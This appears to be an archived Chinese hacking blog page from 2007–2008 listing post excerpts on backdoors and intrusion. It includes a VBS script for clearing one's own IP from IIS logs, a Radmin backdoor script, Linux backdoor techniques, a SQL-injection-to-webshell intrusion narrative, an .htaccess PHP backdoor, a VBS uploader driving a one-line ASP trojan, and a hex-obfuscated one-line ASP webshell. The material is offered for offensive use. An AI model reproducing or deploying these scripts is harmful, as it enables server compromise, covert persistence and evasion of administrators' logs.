http://www.bycnboy.com/cnboy/soft_cnboy/x-scan.html

[欢迎光临] ： 提示：如果你觉得音乐太吵闹，请你选择下面静音版浏览博客。
中国知音在线 http://Online.bycnboy.com

★→切换到: ∑静音版∈ ∮音乐版 ∮ ∈←
中国知音QQ:274088126 Msn:CnBoy99@Hotmail.com E-mail:lide8008@163.com

Tag: 后门预览模式: 普通 | 列表

[脚本知识]　清空iis log 中自己登录ip的vbs

作者:中国知音日期:2008-03-23

[脚本知识]　清空iis log 中自己登录ip的vbs

Option Explicit

Dim sourcefile,ipaddress,objargs

const destfile="tempfile"
Const ForWriting = 2

Dim Text
Dim fso,objNet,ServiceObj
Dim txtStream, txtStreamOut

分类:[资源共享] | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 939

[黑客必备]　Vbs脚本实现radmin终极后门　[工具打包]

作者:中国知音日期:2008-03-23

[黑客必备]　Vbs脚本实现radmin终极后门　[工具打包]

在网上看到N多人做radmin后门，要导出注册表而且还用被杀软件K杀。所以本人把自己写的脚本提供大家分享。比较实用，希望大家喜欢。
on error resume next
const HKEY_LOCAL_MACHINE = &H80000002
strComputer = "."
Set StdOut = WScript.StdOut

分类:[资源共享] | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 1156

[Linux文章]　浅析Linux系统后门技术和实践方法

作者:中国知音日期:2008-01-28

[Linux文章]　浅析Linux系统后门技术和实践方法

后门简介

入侵者完全控制系统后，为方便下次进入而采用的一种技术。
一般通过修改系统配置文件和安装第三方后门工具来实现。
具有隐蔽性，能绕开系统日志，不易被系管理员发现等特点。

常用后门技术

增加超级用户账号
破解/嗅探用户密码
放置SUID Shell
rhosts + +
利用系统服务程序
TCP/UDP/ICMP Shell

Tags: Linux Linux 后门后门黑客技术黑客技术网站入侵网站入侵

分类:[分享资源] | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 781

[黑客技巧] TCP版backshell的VBS脚本

作者:中国知音日期:2008-01-13

[黑客技巧] TCP版backshell的VBS脚本

一、踩点

　　ping www.xingno.com 发现超时，可以是有防火墙或做了策略。再用superscan扫一下，发现开放的端口有很多个，初步估计是软件防火墙。

　　二、注入

　　从源文件里搜索关键字asp，找到了一个注入点。用nbsi注入，发现是sa口令登陆，去加了一个用户，显示命令完成。哈哈，看来管理员太粗心了。先上传一个webshell，上传了一个老兵的asp木马。接下来的就是个人习惯了，我平时入侵的习惯是先上传webshell，然后再把webshell提升为system权限。因为这样说可以说在入侵之时会非常的方便，我个人觉得这个方法非常好。

Tags: 技术技术技术文章技术文章黑客技术黑客技术脚本脚本后门后门

分类:[技术讨论] | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 874

[黑站工具] .htaccess后门

作者:中国知音日期:2008-01-13

[黑站工具] .htaccess后门

作者：GaRY
来源：GaRY's Blog

PHP手册,常看常新:)
PHP有个特性,会根据apache的httpd.conf和.htaccess来覆盖自己php.ini的设置.
恰好,找到两个邪恶的属性:
auto_prepend_file string 指定在主文件之前自动解析的文件名。该文件就像调用了 include() 函数一样被包含进来，因此会使用 include_path。
特殊值 none 禁止了自动前缀。
auto_append_file string
指定在主文件之后自动解析的文件名。该文件就像调用了 include() 函数一样被包含进来，因此会使用 include_path。
特殊值 none 禁止了自动后缀。

Tags: 技术技术技术文章技术文章黑客技术黑客技术脚本脚本后门后门

分类:[技术讨论] | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 1043

[后门] IIS后门

作者:中国知音日期:2007-11-30

[后门] IIS后门

这个后门用在韩国,台湾的服务器上很稳定.

Tags: 后门后门 IIS IIS

分类:[技术讨论] | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 964

[菜鸟宝典]　一种奇特的挂马方式

作者:中国知音日期:2007-11-27

[菜鸟宝典]　一种奇特的挂马方式

一种奇特的挂马方式
我写这文章并不是教大家怎么跑去挂马啊，挂马是不对的！不过有的时候真的很想做些让人觉得痛快的事情，因为我就碰到很多的管理员，你跟他说服务器有问题吧！他不信，你改些东西警告他吧，他比你还勤快，你一改他马上覆盖回去，让人真的很郁闷。还有在国外的一些机器上，什么权限都拿到了也不知道他怎么弄的，什么都不让写，好不容易写个文件没一会又改回去了，真的让人很!#$%%#%^#%^，据说就有一种软件能监视重要的文件，一旦发现更改就会给恢复过去，譬如他监视web目录的话我们就不能更改他网站的任何内容了。不过，看了很多大虾的文章，自己也略微研究了下，也总算琢磨点东西出来，不用写任何文件就可以实现将别人的页面涂改和大家经常传说的挂马等等后果，这里就给大家介绍下，那些只知道勤快的管理员也要小心了！

Tags: 挂马挂马后门后门

分类:[技术讨论] | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 949

[工具收藏] 一句话木马用Upfile.vbs脚本

作者:中国知音日期:2007-11-23

[工具] 一句话木马用Upfile.vbs脚本

with wscript
if .arguments.count<2 then .quit
ffn=replace(.arguments(1),"\","%5C"):ffn=replace(ffn,":","%3A"):ffn=replace(ffn,"~","%7E")
url= "http://www.xxxx.com/a.asp?a=with+server.createobject%28%22adodb.stream%22%29%0D%0A.type%3D1%0D%0A.open%0D%0A.write+request.binaryread%28request.totalbytes%29%0D%0A.savetofile+%22"&ffn&"%22%2C2%0D%0Aend+with%0D%0AResponse.end"
fn=.arguments(0)

Tags: 后门后门工具工具一句话后门一句话后门脚本脚本

分类:[技术讨论] | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 1039

[工具]一句话asp木马加密（去掉asp里的％）

作者:中国知音日期:2007-11-23

[工具]一句话asp木马加密（去掉asp里的％）

不知道怎样表达清楚。看例子吧：

<script language=vbs runat=server>
Execute(HextoStr("65786563757465287265717565737428636872283335292929"))
Function HextoStr(data)
HextoStr="EXECUTE """""
C="&CHR(&H"
N=")"

Tags: ASP ASP 后门后门工具工具

分类:[技术讨论] | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 984